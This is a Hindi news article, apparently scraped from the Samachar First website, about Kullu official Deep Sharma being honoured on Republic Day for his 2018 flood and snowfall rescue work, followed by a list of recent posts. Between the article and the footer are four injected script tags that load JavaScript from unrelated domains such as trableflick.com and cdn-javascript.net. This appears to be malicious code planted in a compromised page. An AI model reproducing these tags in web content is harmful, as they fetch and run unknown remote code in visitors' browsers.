Categories: हिमाचल

सराहनीय सेवाओं के लिए गणतंत्र दिवस पर किया दीप शर्मा को सम्मानित

<p>दीप शर्मा का मानना है कि व्यक्ति को अपनी क्षमताओं का पूर्ण दोहन करना चाहिए। सकारात्मक सोच के साथ अपने दिनचर्या के कार्यों से हटकर हम लोगों की सेवा के अनेक कार्यों को अंजाम दिया जा सकता है। यही सोच उन्हें दूसरों से अलग बनाती है। दीप शर्मा वर्तमान में उपायुक्त कार्यालय कुल्लू में जिला नाजिर के पद पर कार्य कर रहे हैं। ऐतिहासिक ढालपुर मैदान में जिला स्तरीय गणतंत्र दिवस समारोह के मौके पर कृषि मंत्री डॉ. राम लाल मारकण्डा ने जब उन्हें सम्मानित किया तो अपार जनसमूह ने भी दीप शर्मा का तालियों के साथ अभिवादन किया।</p>

<p>सितम्बर, 2018 में हुई भारी बारीश और हिमपात के दौरान दीप शर्मा ने कुल्लू औऱ लाहौल-स्पिति जिलों के दुर्गम क्षेत्रों में फंसे स्थानीय लोगों और सैलानियों को आपदा प्रबंधन के अंतर्गत राहत और बचाव अभियान में सराहनीय सेवाएं प्रदान की थी। वह दिन-रात इस कार्य में विषम परिस्थितियों के चलते जुटे रहे और सैंकड़ों लोगों को राहत पहुंचाने का पुनीत कार्य किया। यही नहीं, उपायुक्त कार्यालय और अन्य कार्यालयों के अधिकारी औऱ कर्मचारी भी दीपू की कार्यशैली के मुरीद हैं। उनके गृह क्षेत्र के लोग भी अपने राजस्व और अन्य छोटे-छोटे कार्यों को करवाने के लिए सबसे पहले उनको एप्रोच करते हैं। बे-झिझक हर किसी की समस्या का समाधान करवाने की कोशिश करते हैं। अंतरराष्ट्रीय कुल्लू दशहरा उत्सव के दौरान दीपू दिन-रात मेहनत करते हैं और किसी भी प्रकार की जिम्मेवारी का बखूबी निर्वहन करते है। अधिकारियों की अपेक्षाओं पर सदैव खरा उतरना उनका स्वभाव बन चुका है।</p>

<p>&nbsp;</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1580108811952″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

“JOA IT पदों पर चयनित उम्मीदवारों की सूची जारी, इतने को मिली नियुक्ति”

  Shimla: सामाजिक न्याय एवं अधिकारिता विभाग ने राज्य चयन आयोग की सिफारिशों के आधार…

3 hours ago

अतिक्रमण एक रात का नहीं, सुक्खू सरकार से पहले हुआ अवैध निर्माण: कुलदीप

  Shimla : हिमाचल प्रदेश में स्ट्रीट वेंडर्स को लेकर विधानसभा की ओर से कमेटी…

4 hours ago

मुख्यमंत्री के निर्देश पर हमीरपुर में ‘कायाकल्प’ अभियान से बदल रही है शहर की तस्वीर

  Hamirpur: मुख्यमंत्री ठाकुर सुखविंदर सिंह सुक्खू के गृह जिले के मुख्यालय हमीरपुर शहर की…

4 hours ago

राज्य के स्वास्थ्य ढांचे को मजबूत करने के लिए ठोस कदम उठा रही है सरकार: बाली

  टांडा मेडिकल कालेज भी स्वास्थ्य क्षेत्र में निरंतर नए आयाम कर रहा स्थापित विश्व…

4 hours ago

प्रमोशन लिस्ट के इंतजार में कई शिक्षक बिना प्रिंसिपल बने होंगे रिटायर

  वर्तमान में प्रिंसिपल के 500 पद है खाली लेक्चरर्स की 90:10 की मांग का…

5 hours ago

अनुष्का दत्ता पहुंची मिस यूनिवर्स इंडिया-2024 के फाइनल में, हिमाचल की पहली प्रतिभागी

  Shimla: रोह‍डू की रहने वाली 22 वर्षीय अनुष्का दत्ता मिस यूनिवर्स इंडिया 2024 प्रतियोगिता…

5 hours ago